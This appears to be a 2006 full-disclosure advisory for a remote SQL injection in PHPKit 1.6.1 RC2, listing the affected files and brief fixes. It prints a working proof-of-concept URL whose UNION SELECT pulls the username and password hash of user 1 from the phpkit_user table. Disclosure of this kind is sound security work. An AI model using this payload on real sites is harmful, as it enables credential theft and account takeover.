Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

SiteXpress SQL Injection

SiteXpress SQL Injection

[Full-disclosure] Advisory 14/2006: Dotdeb PHP Email Header Injection Vulnerability

ASPintranet SQL Injection

From:	philipp.niedziela_(at)_gmx.de <philipp.niedziela_(at)_gmx.de>
Date:	14.11.2006
Subject:	PHPKit 1.6.1 RC2 (faq/faq.php) Remote SQL Injection Exploit

+--------------------------------------------------------------------
+
+ PHPKit 1.6.1 RC2
+
+ Original advisory:
+ http://www.bb-pcsecurity.de/
+
+--------------------------------------------------------------------
+
+ Affected Software .: PHPKit 1.6.1 RC2
+ Venedor ...........: http://www.phpkit.de/
+ Class .............: Remote SQL Injection
+ Risk ..............: high
+ Found by ..........: Philipp Niedziela
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ SQL-INJECTION IN SEVERAL FILES:
+  guestbook/print.php
+  faq/faq.php
+  more (but untested!)
+
+
+--------------------------------------------------------------------
+
+ POC:
+
+--------------------------------------------------------------------
+
+ /include.php?path=faq/faq.php&catid=-
1\'%20UNION%20SELECT%20
+ 1,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20
+ FROM%20phpkit_user%20where%20%20user_id=1%20and%20\'
1\'=\'1
+
+
+ Solution:
+  -> Install Hack_Block (search google :))
+  -> escape the variables in your SQL-Statement
+
+
+--------------------------------------------------------------------
+
+ Greets and Thanks: /str0ke
+
+-------------------------[ E O F ]----------------------------------